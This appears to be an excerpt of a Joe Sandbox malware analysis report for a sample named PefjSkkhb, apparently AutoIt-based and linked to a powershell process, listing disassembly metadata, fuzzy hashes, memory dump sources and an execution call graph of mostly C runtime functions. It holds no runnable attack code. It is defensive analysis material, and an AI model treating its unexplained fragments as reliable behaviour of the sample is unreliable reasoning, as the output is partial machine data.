                                                                      • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction Fuzzy Hash: 3B11B626A1874182E791BF11E1043BDA261E780B68FE84036DA4D86794CF3DE882C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction ID: f1f984aa422c2798e709b79f16b3ef89dc09b50b90ab2f43711da559f28eb685
                                                                      • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction Fuzzy Hash: 1D116362A5DA8191EB10FF10E1511F9A360FF897A4FC44531EA8D87799EF2CF605CBA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                      • Instruction ID: 243884d4dae9b072859c4147d11655363cbd4533e7ee2a3da1dd2dbdff8989b8
                                                                      • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                      • Instruction Fuzzy Hash: 60116321A4DA8151EF10FF10E1512F99350BF857A4F844631DA9D8778AEF2CF6058B90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID:
                                                                      • API String ID: 3712363035-3916222277
                                                                      • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                      • Instruction ID: 3acf39d5828a5522774c28360d52efb9e6dee78e2317750a384d32dfb6f9a8ec
                                                                      • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                      • Instruction Fuzzy Hash: 82117032A0C7418AE710EF56F80456AF6A5FB847A8F844135EA4D87B65CF7DF490CB90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                      • Instruction ID: 2806251b5e40bc70426fd786da4862d355cc98322e96408d387d308d18743773
                                                                      • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                      • Instruction Fuzzy Hash: 0F016521B5C94291EA20FF14E1511B9D361FF853A4FC44631E99D87B9ADF2CF608CB90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$tan
                                                                      • API String ID: 3384550415-2428968949
                                                                      • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction ID: 95243842f35c7de80c2d7f851ca418108c65cd9ec8a91c32d048ac6f04408db9
                                                                      • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction Fuzzy Hash: 26019671A28B8542DB14EF12A44037AA252BBDABE4F504334E95E0BB94EF7CE1508B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$sin
                                                                      • API String ID: 3384550415-1565623160
                                                                      • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction ID: ed341c56d9cd1f0035a9bae36659aa2bb08f9e7a37bb83df33bf1cf68110d5a6
                                                                      • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction Fuzzy Hash: 8901D871E18BC542D714EF22944037AA252BFDABE4F504334E95E0AB94EF7DE0404B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$cos
                                                                      • API String ID: 3384550415-1949035351
                                                                      • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction ID: daa833f270ada0ce17b6aa73adc0d4b48449fdb20cb94df8269662a8c7daf8bb
                                                                      • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction Fuzzy Hash: CE01D871E18B8942D714EF22944037AA262BFDABE4F504334E95E0AB94EF7DE0505B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$exp
                                                                      • API String ID: 1757819995-2878093337
                                                                      • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction ID: c770c9d54a8014d1ed38771be36c1917a8e2f969c0ce6f0b8b1c2705c59f7626
                                                                      • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction Fuzzy Hash: F601C836928B8887E220DF24D4452AABBB0FFEA754F601315E7441AB60CB7DE4C19B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction ID: 9f8b55dc5dc84852821712369d46f7e0d379c002255b95b577ad607d9c4fc9d5
                                                                      • Opcode Fuzzy Hash: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction Fuzzy Hash: 28F02020B4C64682EB287B65B1453B9A211AF887A0FC40430C9088BBDACFACF4C183A0
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7C0E775E9
                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7C0E77241,?,?,?,?,00007FF7C0E7660C,?,?,?,?,00007FF7C0E74CD3), ref: 00007FF7C0E77600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction ID: 1be684bba5c816311e12b14447a0c8d291687f2a608eb6886731f2921fc746dc
                                                                      • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction Fuzzy Hash: 62E0A021A0C942C1EA05BF45F4044B8A361BF48BA5FC84031D94D86354CF2CF988C2B0
                                                                      APIs
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C0E75629
                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7C0E7563A
                                                                        • Part of subcall function 00007FF7C0E77018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E7563F), ref: 00007FF7C0E7708D
                                                                        • Part of subcall function 00007FF7C0E77018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E7563F), ref: 00007FF7C0E770BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3561508498-410509341
                                                                      • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction ID: 800a62cc9bd00082345b41fc0f07e1f895b1562955ffc3383d27e34045144f12
                                                                      • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction Fuzzy Hash: 10D0126261854591DE10FF04D4443A8E330F780328FD04431D24C816B1EF2CE64AD390
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2505786014.00007FF848670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848670000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff848670000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42533ed9c093610b736e121ffe308e77e6a2c30d8b4f0df1d6f637b596a46a1a
                                                                      • Instruction ID: cba3c9f737a1fadb49a81ae2e10ea73b0efb9d711eb4384f97c3ccc41a2e6213
                                                                      • Opcode Fuzzy Hash: 42533ed9c093610b736e121ffe308e77e6a2c30d8b4f0df1d6f637b596a46a1a
                                                                      • Instruction Fuzzy Hash: 5BE10261A0EBC65FE396B77818292757FE1EF56794F0801FAC049CB1D3DA186C0683A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2505786014.00007FF848670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848670000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff848670000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a584b875fda8206f4eb41f99ff32ef7d40250dbec4d3fdc53b2b218e61e1c1a
                                                                      • Instruction ID: 340ed1c3c4905904b0151aacb0c817f17f104053165648feef4bab1732ad4693
                                                                      • Opcode Fuzzy Hash: 4a584b875fda8206f4eb41f99ff32ef7d40250dbec4d3fdc53b2b218e61e1c1a
                                                                      • Instruction Fuzzy Hash: 9D4102A1E1FA874FF2D9B6BC086927866D2EF447D4F5800B9C40DC31D3DE08A84543AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2504561909.00007FF8485A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff8485a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction ID: a79ca0ebcacdb6ab6ffb7a3e7dffe0c8612ed94d333100b250dd3ccfd9331f22
                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction Fuzzy Hash: DC01677111CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC3661DB36E882CB45

                                                                      Execution Graph

                                                                      Execution Coverage:4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:88
                                                                      execution_graph 97569 6c23ed 97570 6c23f7 97569->97570 97573 6c343f 97570->97573 97574 6c34df 97573->97574 97580 6c3452 _memmove 97573->97580 97576 6d0fe6 Mailbox 59 API calls 97574->97576 97576->97580 97577 6c3459 97578 6d0fe6 Mailbox 59 API calls 97577->97578 97579 6c2403 97577->97579 97578->97579 97581 6d0fe6 97580->97581 97583 6d0fee 97581->97583 97584 6d1008 97583->97584 97586 6d100c std::exception::exception 97583->97586 97591 6d593c 97583->97591 97608 6d35d1 DecodePointer 97583->97608 97584->97577 97609 6d87cb RaiseException 97586->97609 97588 6d1036 97610 6d8701 58 API calls _free 97588->97610 97590 6d1048 97590->97577 97592 6d59b7 97591->97592 97605 6d5948 97591->97605 97617 6d35d1 DecodePointer 97592->97617 97594 6d59bd 97618 6d8d58 58 API calls __getptd_noexit 97594->97618 97597 6d597b RtlAllocateHeap 97598 6d59af 97597->97598 97597->97605 97598->97583 97600 6d59a3 97615 6d8d58 58 API calls __getptd_noexit 97600->97615 97604 6d5953 97604->97605 97611 6da39b 58 API calls 2 library calls 97604->97611 97612 6da3f8 58 API calls 8 library calls 97604->97612 97613 6d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97604->97613 97605->97597 97605->97600 97605->97604 97606 6d59a1 97605->97606 97614 6d35d1 DecodePointer 97605->97614 97616 6d8d58 58 API calls __getptd_noexit 97606->97616 97608->97583 97609->97588 97610->97590 97611->97604 97612->97604 97614->97605 97615->97606 97616->97598 97617->97594 97618->97598 97619 6b9a88 97622 6b86e0 97619->97622 97623 6b86fd 97622->97623 97624 6f0fad 97623->97624 97625 6f0ff8 97623->97625 97628 6b8724 97623->97628 97624->97628 97629 6f0fb5 97624->97629 97632 6f0fc2 97624->97632 97697 72aad0 291 API calls __cinit 97625->97697 97636 6b3c30 68 API calls 97628->97636 97637 6f11af 97628->97637 97640 6b8a17 97628->97640 97646 6b3f42 68 API calls 97628->97646 97647 6b898d 97628->97647 97651 6b53b0 97628->97651 97679 6b39be 97628->97679 97683 6b3938 68 API calls 97628->97683 97684 6b855e 291 API calls 97628->97684 97685 6b5278 97628->97685 97690 6d2f70 97628->97690 97693 6b84e2 89 API calls 97628->97693 97694 6b835f 291 API calls 97628->97694 97698 6b523c 59 API calls 97628->97698 97699 7073ab 59 API calls 97628->97699 97700 6c1c9c 97628->97700 97695 72b0e4 291 API calls 97629->97695 97632->97647 97696 72b58c 291 API calls 3 library calls 97632->97696 97635 6f1289 97635->97635 97636->97628 97704 72ae3b 89 API calls 97637->97704 97646->97628 97647->97640 97705 71a48d 89 API calls 4 library calls 97647->97705 97652 6b53cf 97651->97652 97675 6b53fd Mailbox 97651->97675 97653 6d0fe6 Mailbox 59 API calls 97652->97653 97653->97675 97654 6b69fa 97655 6c1c9c 59 API calls 97654->97655 97674 6b5569 Mailbox 97655->97674 97656 6b69ff 97657 6ef165 97656->97657 97658 6ee691 97656->97658 97712 71a48d 89 API calls 4 library calls 97657->97712 97708 71a48d 89 API calls 4 library calls 97658->97708 97659 6c1207 59 API calls 97659->97675 97663 6d0fe6 59 API calls Mailbox 97663->97675 97664 6ee6a0 97664->97628 97665 6d2f70 67 API calls __cinit 97665->97675 97666 6eea9a 97668 6c1c9c 59 API calls 97666->97668 97668->97674 97669 6c1c9c 59 API calls 97669->97675 97671 707aad 59 API calls 97671->97675 97672 6eeb67 97672->97674 97709 707aad 59 API calls 97672->97709 97674->97628 97675->97654 97675->97656 97675->97658 97675->97659 97675->97663 97675->97665 97675->97666 97675->97669 97675->97671 97675->97672 97675->97674 97676 6eef28 97675->97676 97678 6b5a1a 97675->97678 97706 6b7e50 291 API calls 2 library calls 97675->97706 97707 6b6e30 60 API calls Mailbox 97675->97707 97710 71a48d 89 API calls 4 library calls 97676->97710 97711 71a48d 89 API calls 4 library calls 97678->97711 97680 6b39c9 97679->97680 97682 6b39f0 97680->97682 97713 6b3ea3 68 API calls Mailbox 97680->97713 97682->97628 97683->97628 97684->97628 97686 6d0fe6 Mailbox 59 API calls 97685->97686 97687 6b5285 97686->97687 97688 6b5294 97687->97688 97714 6c1a36 97687->97714 97688->97628 97718 6d2e74 97690->97718 97692 6d2f7b 97692->97628 97693->97628 97694->97628 97695->97632 97696->97647 97697->97628 97698->97628 97699->97628 97701 6c1caf 97700->97701 97702 6c1ca7 97700->97702 97701->97628 97796 6c1bcc 97702->97796 97704->97647 97705->97635 97706->97675 97707->97675 97708->97664 97709->97674 97710->97678 97711->97674 97712->97674 97713->97682 97715 6c1a45 __wsetenvp _memmove 97714->97715 97716 6d0fe6 Mailbox 59 API calls 97715->97716 97717 6c1a83 97716->97717 97717->97688 97719 6d2e80 _wprintf 97718->97719 97726 6d3447 97719->97726 97725 6d2ea7 _wprintf 97725->97692 97743 6d9e3b 97726->97743 97728 6d2e89 97729 6d2eb8 DecodePointer DecodePointer 97728->97729 97730 6d2ee5 97729->97730 97731 6d2e95 97729->97731 97730->97731 97789 6d89d4 59 API calls wcstoxq 97730->97789 97740 6d2eb2 97731->97740 97733 6d2f48 EncodePointer EncodePointer 97733->97731 97734 6d2ef7 97734->97733 97735 6d2f1c 97734->97735 97790 6d8a94 61 API calls 2 library calls 97734->97790 97735->97731 97738 6d2f36 EncodePointer 97735->97738 97791 6d8a94 61 API calls 2 library calls 97735->97791 97738->97733 97739 6d2f30 97739->97731 97739->97738 97792 6d3450 97740->97792 97744 6d9e4c 97743->97744 97745 6d9e5f EnterCriticalSection 97743->97745 97750 6d9ec3 97744->97750 97745->97728 97747 6d9e52 97747->97745 97774 6d32e5 58 API calls 3 library calls 97747->97774 97751 6d9ecf _wprintf 97750->97751 97752 6d9ed8 97751->97752 97753 6d9ef0 97751->97753 97775 6da39b 58 API calls 2 library calls 97752->97775 97761 6d9f11 _wprintf 97753->97761 97778 6d8a4d 58 API calls 2 library calls 97753->97778 97756 6d9edd 97776 6da3f8 58 API calls 8 library calls 97756->97776 97757 6d9f05 97759 6d9f0c 97757->97759 97760 6d9f1b 97757->97760 97779 6d8d58 58 API calls __getptd_noexit 97759->97779 97764 6d9e3b __lock 58 API calls 97760->97764 97761->97747 97762 6d9ee4 97777 6d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97762->97777 97766 6d9f22 97764->97766 97768 6d9f2f 97766->97768 97769 6d9f47 97766->97769 97780 6da05b InitializeCriticalSectionAndSpinCount 97768->97780 97781 6d2f85 97769->97781 97772 6d9f3b 97787 6d9f63 LeaveCriticalSection _doexit 97772->97787 97775->97756 97776->97762 97778->97757 97779->97761 97780->97772 97782 6d2f8e RtlFreeHeap 97781->97782 97783 6d2fb7 _free 97781->97783 97782->97783 97784 6d2fa3 97782->97784 97783->97772 97788 6d8d58 58 API calls __getptd_noexit 97784->97788 97786 6d2fa9 GetLastError 97786->97783 97787->97761 97788->97786 97789->97734 97790->97735 97791->97739 97795 6d9fa5 LeaveCriticalSection 97792->97795 97794 6d2eb7 97794->97725 97795->97794 97797 6c1bef _memmove 97796->97797 97798 6c1bdc 97796->97798 97797->97701 97798->97797 97799 6d0fe6 Mailbox 59 API calls 97798->97799 97799->97797 97800 6b9a6c 97803 6b829c 97800->97803 97802 6b9a78 97804 6b8308 97803->97804 97805 6b82b4 97803->97805 97809 6b8331 97804->97809 97813 71a48d 89 API calls 4 library calls 97804->97813 97805->97804 97806 6b53b0 291 API calls 97805->97806 97810 6b82eb 97806->97810 97808 6f0ed8 97808->97808 97809->97802 97810->97809 97812 6b523c 59 API calls 97810->97812 97812->97804 97813->97808 97814 6b6981 97821 6b373a 97814->97821 97816 6b6997 97830 6b7b3f 97816->97830 97818 6b69bf 97820 6b584d 97818->97820 97842 71a48d 89 API calls 4 library calls 97818->97842 97822 6b3758 97821->97822 97823 6b3746 97821->97823 97825 6b375e 97822->97825 97826 6b3787 97822->97826 97843 6b523c 59 API calls 97823->97843 97828 6d0fe6 Mailbox 59 API calls 97825->97828 97844 6b523c 59 API calls 97826->97844 97829 6b3750 97828->97829 97829->97816 97845 6c162d 97830->97845 97832 6b7b64 _wcscmp 97833 6c1a36 59 API calls 97832->97833 97836 6b7b98 Mailbox 97832->97836 97834 6effad 97833->97834 97850 6c17e0 